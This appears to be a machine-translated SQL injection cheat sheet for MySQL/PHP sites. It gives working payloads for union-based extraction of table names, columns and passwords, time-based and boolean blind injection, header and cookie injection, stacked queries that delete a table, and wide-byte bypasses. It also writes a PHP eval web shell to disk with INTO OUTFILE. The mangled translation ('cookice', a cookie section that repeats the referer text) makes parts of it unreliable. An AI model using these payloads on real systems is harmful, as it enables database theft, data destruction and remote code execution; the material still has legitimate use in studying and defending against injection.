The first part ： Conventional injection （ The data has an echo front end ）

First step ： Test data types

1. Digital

id=1 and 1=1 The page is normal          id=1 and 1=2 The page is not working

2. Character

id=1‘ and ’1‘=’1 The page is normal          id=1‘ and ’1‘=’2 The page is not working

3. Sleep judgment ( Use when data is not echoed to the front end )

id=1' and sleep(10)--+      Page buffer 10 Seconds indicates that the judgment is correct

4. Develop common types of accepted parameters

Digital :          id=$id

Character :          id='$id'

Brackets + Single quotation marks : id=('$id')

Brackets + Double quotes : id=("$id")

Double brackets + Single quotation marks : id=(('$id'))

5. Note the annotation when injecting --+ and # Alternative use of

The second step ： Start injecting

The following databases mysql, The data type is integer as a demonstration case

1. Guess the number of fields ( The page shows the error and normal thresholds )

?id=1 order by 4

2. Error guessing preparation

?id=-1 union select 1,2,3,4

3. information gathering

Database version :        version()        

Database name :        database()

Database users :        user()

operating system :        @@version_compile_os

Database path :        @@datadir        perhaps         @@basedir

4. Get table name ( Use the database name obtained in the previous step )

Query the specified database name dvwa The following table name information : ?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='dvwa'

5. Get column name ( Use the table name obtained in the previous step )

Query the specified table name GJC Column name information under : ?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='GJC'

6. Get data

Query the specified data in the table name :?id=1 union select 1,name,password,4 from GJC

The second part : Blind note ( Data does not echo to the front end )

1. Based on error reporting SQL Inject

2. Boolean based SQL Inject ( Pay attention to the use of dichotomy )

We construct a judgment condition ( length(database()) = 8) Judge whether the target meets the conditions , If the conditions are met, the execution is successful , If not, the execution fails .database() Is the current database name length(database()) Fetch the length of the database name < = > Are greater than 、 be equal to 、 Less than , Used to judge whether the conditions are met . To guess .

3. Based on time SQL Inject

  The third part : File injection operation

Conditions of use : We need to find the absolute path of the website before using it .( Access method : Error indication , Google Syntax ,site: The target site , Legacy documents such as phpinfo, Vulnerability exposure path , Read configuration file )

1. First determine whether the filtering method is numeric or character

2. Start injecting files ( Although the page reports an error , But we have uploaded it successfully )

?id=1')) union select 1,2,3 into outfile "D:\\phpStudy\\ Other paths \\" --+

We can write a sentence directly into it

 ?id=1')) union select 1,2,'<?php @eval($_post["mima"])?>' into outfile "D:\\phpStudy\\ Other paths \\yijuhua.php" --+

The fourth part : Commit injection

1. Log in to the registration box SQL Inject

Judge the account number (username) Or password (password) It is better to inject

2.user-agent Inject

Get it by grabbing it http head , modify user-agent The value of the to sql Inject .

3.referer Inject

Get it by grabbing it http head , modify referer The value of the to sql Inject .

3.cookice Inject

Get it by grabbing it http head , modify referer The value of the to sql Inject .

( After the first login , preservation cookice sign out , Modify at next login cookice The value of implements injection )

The fifth part : Injection expansion

1. The secondary injection  

The principle of secondary injection : When inserting data into database for the first time , Just used addslashes Or with the help of get_magic_quotes_gpc The special characters are escaped , however addslashes One feature is that although parameters will be added after filtering “\” Transference , however “\” It's not inserted into the database , The original data is still written to the database .
After storing the data into the database , Developers think the data is credible . The next time you need to query , The dirty data is directly extracted from the database , No further inspection and treatment , This will cause SQL The second injection of . For example, when inserting data for the first time , Data with single quotation marks , Directly inserted into the database ; Then in the next use, in the process of patching , A secondary injection is formed .

2. Encryption and decryption Injection

SQL Encryption and decryption injection principle : namely get perhaps post The parameters of are base64 And other encryption methods to encrypt the data , Pass the parameter to the server ,eg：www.xxx.com/index.php?id=MQ==
Encryption part ：MQ==
Decryption result ：1 amount to id=1
If you want to write an injection statement , The statement should be constructed first , Again base64 encryption ,
id=1 and 1=1
base64 Encryption result ：MSBhbmQgMT0x
Statement for ：www.xxx.com/index.php?id=MSBhbmQgMT0x

3.DNSlog Out of band query injection ( Agent pool )

Why use dnslog Inject : In general , When we can't get data directly through joint query , We can only go through blind Injection , Get data step by step , however , Use blind injection , Manual testing takes time , You might think of using sqlmap Run the data directly , But in the actual test , Use sqlmap Running blind injection , There's a good chance , The website puts your ip Seal off , This will affect our test progress , Maybe you can use a proxy pool .

4. Stack Injection

limited : Some databases support

principle :mysql Add... At the end of each statement in the command line ; End of statement . In this way, we wonder whether we can use multiple statements together .( benefits : Don't worry about encryption )

for example :select * from products where prodictid=1;delete from products

When the query is executed , The first item shows the query information , Second, delete the entire table .

5. Wide byte Injection

In the use of PHP Connect MYSQL When , When setting "setcharacter_set_client = gbk" It will cause a coding conversion problem , That is, we are familiar with wide byte injection , When there is wide byte Injection , Bring in the injection parameters % DF%27, You can put (%5C) eat , for instance .id=1%df' and 1=1%23

6. other ... ...

Be careful : The above does not consider the existence of the other party waf The condition of protection !!!